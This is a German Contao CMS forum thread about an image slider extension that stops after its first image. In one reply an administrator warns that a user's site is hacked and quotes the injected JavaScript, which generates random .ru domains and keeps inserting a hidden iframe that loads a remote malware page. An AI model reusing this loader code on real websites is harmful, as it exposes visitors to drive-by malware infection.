Contao-Camp 2024
Ergebnis 1 bis 6 von 6

Thema: Imageslider funktioniert nicht

  1. #1
    Contao-Nutzer
    Registriert seit
    09.02.2011.
    Beiträge
    10

    Standard Imageslider funktioniert nicht

    Hallo,

    Ich habe mir die Erweiterung Imageslider heruntergeladen und lokal auf meinem PC konfiguriert etc. wo es auch einwandfrei funktioniert hatte.

    Seit ich es aber auf meine Domain hochgeladen habe rürt sich gar nichts mehr, es kommt nur immer das erste bild und kein weiteres mehr.

    Das selbe Problem hatte ich auch schon mit der Erweiterung Slideshow2.

    Ich hoffe ihr könnt mir bei meinem Problem irgendwie weiterhelfen.

    Lg
    Domi



    [Moderation: Thema verschoben.]
    Geändert von xchs (08.03.2012 um 17:43 Uhr)

  2. #2
    Contao-Fan
    Registriert seit
    22.06.2009.
    Ort
    Düsseldorf
    Beiträge
    471

    Standard

    Mehr informationen... Contao Version, Welcher Browser (alle?), tritt es lokal und im internet auf? Ist die Seite online?

  3. #3
    Contao-Nutzer
    Registriert seit
    09.02.2011.
    Beiträge
    10

    Standard

    Es hat sich schon erledigt, es haben anscheinend Dateien gefehlt, habe diese jetzt manuell hochgeladen und es funktioniert alles.

  4. #4
    Contao-Nutzer Avatar von LeoDesign
    Registriert seit
    25.06.2009.
    Ort
    Münchhausenland
    Beiträge
    119

    Standard Hilfe erbeten - Slider will nicht MEHR...

    Hallo zusammen,

    ich habe folgendes Problem: Auf http:_//www.druidenwerk.de/index.php/impressum.html (Obacht: Trojanerbefall - die Moderatorin) habe ich den Imageslider 2 mal eingebunden: oben im Header sowieso und einmal unten im Mainbereich. Beide funktionieren nicht mehr und ich kann leider nicht sagen, was seit dem Ausfall geändert wurde, da ich die Seite nicht selber pflege.
    Das Modul ist nachträglich von mir auf den neuesten Stand gebracht worden und ich habe auch die Dateien zus. manuell aufgespielt. Beides hat nicht geholfen. Der Slider läßt sich im Backend ganz normal bedienen, wenn ich einen anderen Bilderordner auswähle ändert er das Bild auch, bleibt aber immer beim 1. Bild hängen. Sprich der Slidingeffekt funktioniert nicht. Aber nicht nur das: Wenn ich die Buttons aktiviere, werden diese auch nicht angezeigt. Insofern gehe ich mal davon aus, dass irgendetwas am Script nicht stimmt, obwohl ja alles aktuell ist?!?

    Habe noch folgendes Thema gefunden: https://www.contao-community.de/show...r-posten/page2. Die dort aufgeführte Lösungsmöglichkeit hat leider auch NICHT geholfen:
    Das selbe Problem hatte ich auch - versuch mal, in den "System -> Einstellungen" den Haken bei "Markup komprimieren" im Bereich "Globale Einstellungen" rauszunehmen. Dann unter "Systemwartung" noch die "system/*" Verzeichnisse leeren. Bei mir funktioniert es dann unter contao-2.11. Die Funktion "Markup komprimieren" gibt es aber schon seit 2.10, könnte also auch da die Ursache sein.

    Scheinbar wir durch die Markupkomprimierung das inline-Javascript des Viewers im head der Seite irgendwie zerschossen oder so in Kommentarzeichen gekapselt, dass es nicht mehr ausgeführt wird. Auf jeden Fall sehe ich bei mir dann den "window.addEvent('domready',function()" Teil des Javascripts nicht mehr... Vielleicht liest der Autor ja mit und kann sich das mal anschauen.
    Keine Ahnung wo ich noch schauen könnte. Weiß jemand Rat? Danke für eure Hilfsbereitschaft!

    Gruß Gunnar
    Geändert von lucina (09.08.2012 um 18:36 Uhr)

  5. #5
    Administratorin Avatar von lucina
    Registriert seit
    19.06.2009.
    Ort
    Kiel (DE)
    Beiträge
    7.328
    Partner-ID
    152
    User beschenken
    Wunschliste
    Contao-Projekt unterstützen

    Support Contao

    Standard

    Hmm, ich kann das jetzt gerade mangels Zeit nicht komplett sezieren, aber du scheinst gehackt worden zu sein - Deine Seite bietet einen Trojaner zum Download an. Auschnitt:
    Code:
    ...
    function generatePseudoRandomString(unix, length, zone){
        var rand = new RandomNumberGenerator(unix);
        var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
        var str = '';
    	for(var i = 0; i < length; i ++ ){
            str += letters[createRandomNumber(rand, 0, letters.length - 1)];
        }
        return str + '.' + zone;
    }
     
    setInterval(function(){
        try{
            if(typeof iframeWasCreated == "undefined"){
                var unix = Math.round(+new Date()/1000);             var domainName = generatePseudoRandomString(unix, 16, 'ru');            ifrm = document.createElement("IFRAME"); 
                ifrm.setAttribute("src", "http://"+domainName+"/in.cgi?15"); 
                ifrm.style.width = "0px"; 
                ifrm.style.height = "0px"; 
                ifrm.style.visibility = "hidden"; 
                document.body.appendChild(ifrm);
    			iframeWasCreated = true;
            }
        }catch(e){iframeWasCreated = undefined;}
    }, 100);
    Kann gut sein, dass dieses JS Deinen Slider stört (was aber das geringere Problem ist, würde ich mal sagen).

    Carolina.
    Geändert von lucina (09.08.2012 um 18:38 Uhr)

  6. #6
    Contao-Nutzer Avatar von LeoDesign
    Registriert seit
    25.06.2009.
    Ort
    Münchhausenland
    Beiträge
    119

    Standard Na wunderbar, das auch noch!

    Hallo Carolina,

    danke für deinen Hinweis! Bei mir ist soeben auch sofort mein AVG aufgegangen. Der Hack ist neu, erst am Mittwoch erfolgt. Die Person, um die es sich hier dreht, war am Montag im TV. Diesbezüglich (Trojaner) ist Publicity immer schlecht :-(

    Das war/ist aber nicht des Rätsels Lösung. Die Scripte sind nun ausgetauscht, es funktioniert - wie vorher auch -leider nicht.
    Vielleicht kannst du oder auch eine/r andere/r nette/r Fachfrau/mann nochmal drauf schauen?

    Herzlichen Dank dafür ;-)
    Gruß Gunnar

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •